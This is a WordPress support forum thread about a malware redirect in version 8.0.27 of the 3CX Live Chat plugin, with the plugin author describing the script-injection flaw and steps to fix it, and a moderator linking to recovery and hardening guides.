Support » Plugin: 3CX Live Chat » Infected with malware

  • This plugin used to be fine, but as of 5/16/19 or 5/17/19 the plugin will redirect viewers to malware
    Proof:

Viewing 11 replies - 1 through 11 (of 11 total)
  • Andrew Nevins

    (@anevins)

    WCLDN 2018 Contributor | Volunteer support

    When did you update this plugin?

    It currently says version 8.0.27 in my wordpress plugin page.
    I hate to say for sure that I even have done a manual update for it (at least in the last few days). I don’t think that I have, but its possible. Its not that I updated it and then found this issue. I just started working on my product this morning after getting to the office and it started doing the redirect. Yesterday when I was working on my products it was working fine.

    • This reply was modified 1 year, 8 months ago by radial.
    • This reply was modified 1 year, 8 months ago by radial.
    Plugin Author WP-LiveChat

    (@wp-livechat)

    We’ve updated the plugin this morning with version 8.0.28 which contains the fix for the vulnerability.

    We’re also looking into how to help users restore their website functionality back to normal either with a further update or manual workaround. Please update to version 8.0.28 the soonest.

    Andrew Nevins

    (@anevins)

    WCLDN 2018 Contributor | Volunteer support

    Hi All, the plugin author responded 35 minutes ago but their response was caught up in the forum’s spam queue. Please remain calm and follow that advice.

    If you are interested in this bit:

    We’re also looking into how to help users restore their website functionality back to normal either with a further update or manual workaround. Please update to version 8.0.28 the soonest.

    You will need to consider opening your own individual threads here: https://wordpress.org/support/plugin/wp-live-chat-support/#new-post

    Plugin Author WP-LiveChat

    (@wp-livechat)

    Version 8.0.27 has a vulnerability on GDPR page: if admins click a malicious url while logged in, there’s a chance that some external malicious JS file is added to the custom script section.

    In order to patch yourself against the vulnerability: Uninstall version 8.0.27 and install version 8.0.29 which we will be committing shortly. This version fixes the vulnerability.

    Also check the menu Settings / Custom Scripts and clean up the unwanted code if any is present.

    • This reply was modified 1 year, 8 months ago by Andrew Nevins.
    • This reply was modified 1 year, 8 months ago by WP-LiveChat.

    Thank you Andrew and wp-livechat!

    Plugin Author WP-LiveChat

    (@wp-livechat)

    We’ve actually responded very swiftly to this forum post, but unfortunately our posts keep pending moderator review which usually takes 30 minutes up to an hour or so.

    @tarheit2 Ensure you have removed the malicious code. wp admin – > Live Chat -> Settings -> Custom Scripts and removing the Custom JS that had been injected

    • This reply was modified 1 year, 8 months ago by radial.
    Plugin Author WP-LiveChat

    (@wp-livechat)

    The so called PRO is deprecated. There is no PRO anymore. We’ve deprecated it entirely and merged it’s functionality into 1 fully functional free plugin that’s only hosted here on wordpress.org.

    If you have installed the so called PRO, please uninstall it entirely and use the latest .29 version instead.

    We’ve taken an entirely new direction over the past 1-2 months now, have hired an entirely new team of developers for the plugin and plan to work on making the plugin much better and reliable. The ‘Pro’ deprecation and moving everything to be completely free was basically our first step towards all this. The next step is to improve the reliability and general functionality of the plugin. Our new team also includes a security auditing engineer who will be checking everything extremely thoroughly.

    Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    I’ve closed this topic and have temporarily flagged the accounts that posted malware samples. Those and other replies have been archived.

    Update the plugin and do not post malware samples again. That’s not for these forums and gets removed when found.

    Moderator Jan Dembowski

    (@jdembowski)

    Forum Moderator and Brute Squad

    If you are hacked or think you are hacked, see this reply.

    https://wordpress.org/support/topic/infected-with-malware-3/page/2/#post-11543678

    Give this a good read after that. The compromise may be more than just the Custom Scripts settings.

    https://wordpress.org/support/article/faq-my-site-was-hacked/

    When you have successfully deloused your site then consider giving this a read too.

    https://wordpress.org/support/article/hardening-wordpress/

Viewing 11 replies - 1 through 11 (of 11 total)
  • The topic ‘Infected with malware’ is closed to new replies.